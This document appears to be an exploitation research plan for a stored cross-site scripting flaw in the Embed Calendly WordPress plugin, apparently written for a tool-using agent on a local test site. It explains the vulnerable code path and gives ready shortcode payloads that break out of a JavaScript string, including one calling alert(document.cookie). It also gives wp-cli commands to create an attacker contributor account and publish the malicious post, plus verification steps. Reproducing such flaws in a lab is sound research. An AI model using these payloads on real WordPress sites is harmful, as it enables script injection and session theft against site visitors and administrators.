Exploitation Research Plan - CVE-2026-32411

1. Vulnerability Summary

The Embed Calendly plugin (versions <= 4.4) is vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability exists because shortcode attributes are passed through esc_html() before being rendered inside a <script> block. While esc_html() escapes double quotes ("), it does not escape single quotes (') by default. Since the plugin uses single quotes to delimit JavaScript string literals in the generated output, an attacker can break out of the string and inject arbitrary JavaScript.

2. Attack Vector Analysis

• Endpoint/Shortcode: [calendly] shortcode.
• Vulnerable Parameter: The text attribute.
• Authentication Level: Authenticated (Contributor+). Contributors have the edit_posts capability, allowing them to use shortcodes in post content.
• Preconditions: The shortcode must be configured to trigger the popup_script code path, which occurs when the type is set to 2 (Popup Button) and button_style is not 1.

3. Code Flow

1. Shortcode Entry: EMCS_Shortcode::register_shortcode is called when WordPress parses the [calendly] shortcode (includes/shortcode.php).
2. Attribute Preparation: EMCS_Shortcode::prepare_attributes (Line 46) calls sanitize_text_field($atts['text']). sanitize_text_field removes HTML tags but preserves single quotes.
3. Instantiation: A new EMCS_Embed object is created with these attributes.
4. Rendering: EMCS_Embed::embed_calendar (Line 73 in includes/embed.php) is called.
5. Sanitization: EMCS_Embed::clean_shortcode_atts (Line 115) iterates through attributes and applies esc_html($att_value). Crucially, esc_html() does not escape single quotes.
6. Code Path Selection: If embed_type is 2 (EMCS_BUTTON_EMBED_TYPE) and button_style is not 1, embed_popup_button_widget is called (Line 84).
7. Sink: EMCS_Embed::popup_script (Line 207) generates the HTML/JS:

   return '<div ...><script>window.onload = function() { Calendly.initBadgeWidget({ url: \'' . $this->url . '\', text: \'' . $atts['text'] . '\', ...';
   

   The variable $atts['text'] (containing an unescaped single quote) is placed directly inside the single-quoted JS literal text: '...'.

4. Nonce Acquisition Strategy

This vulnerability is exploited by injecting a shortcode into a WordPress post.

• No Plugin Nonce Required: The injection relies on standard WordPress post creation/editing functionality.
• WP-CLI: The most efficient way to inject the payload for testing is using wp post create.

5. Exploitation Strategy

Step 1: Inject Payload

Use the http_request tool (acting as a Contributor) or wp-cli to create a post containing the malicious shortcode.

Payload: [calendly url="https://calendly.com/test" type="2" button_style="2" text="');alert(origin);//"]

Request (if via HTTP):

• URL: http://localhost:8080/wp-admin/post-new.php
• Action: Create a post with the payload in the content.

Step 2: Trigger Execution

Navigate to the newly created post as any user (including Admin).

Expected HTML Output:

<div id="calendly-popup-button-widget" ...>
<script>window.onload = function() { Calendly.initBadgeWidget({ url: '...', text: '');alert(origin);//', ...

6. Test Data Setup

1. Create Contributor User:

   wp user create attacker attacker@example.com --role=contributor --user_pass=password
   

2. Create Malicious Post:

   wp post create --post_type=post --post_status=publish --post_title="Scheduling" --post_content="[calendly url='https://calendly.com/test' type='2' button_style='2' text='\');alert(origin);//']" --post_author=$(wp user get attacker --field=ID)
   

7. Expected Results

• When the post is viewed, the browser will parse the <script> block.
• The text property of the Calendly.initBadgeWidget object will be terminated early by the injected ');.
• The alert(origin); statement will execute.
• The remainder of the original line will be commented out by //.

8. Verification Steps

1. Identify Post URL: Get the URL of the created post:

   wp post list --post_title="Scheduling" --field=url
   

2. Verify Content: Check the raw HTML output for the unescaped payload:

   # Use the browser_navigate tool to view the page and check for the alert
   # Or use http_request to see the raw source
   

3. Post-Exploit DB Check: Confirm the shortcode is stored correctly:

   wp db query "SELECT post_content FROM wp_posts WHERE post_title='Scheduling'"
   

9. Alternative Approaches

If type="2" (Badge widget) is not desirable, check the embed_popup_text_widget or embed_inline_button_widget:

• embed_popup_text_widget: Uses onclick="Calendly.initPopupWidget({url: '...'})." This also uses single quotes and is vulnerable if type="3".
• embed_inline_button_widget: Similar to above, uses onclick with single quotes.

Alternative Payload (Type 3):
[calendly url="https://calendly.com/test" type="3" text="Click Me" style_class="')};alert(document.cookie);//"]
Note: In embed_popup_text_widget, the style_class attribute is also escaped via esc_html() and placed inside a class attribute, but it is also used elsewhere in some versions. (Verified: text is the most reliable).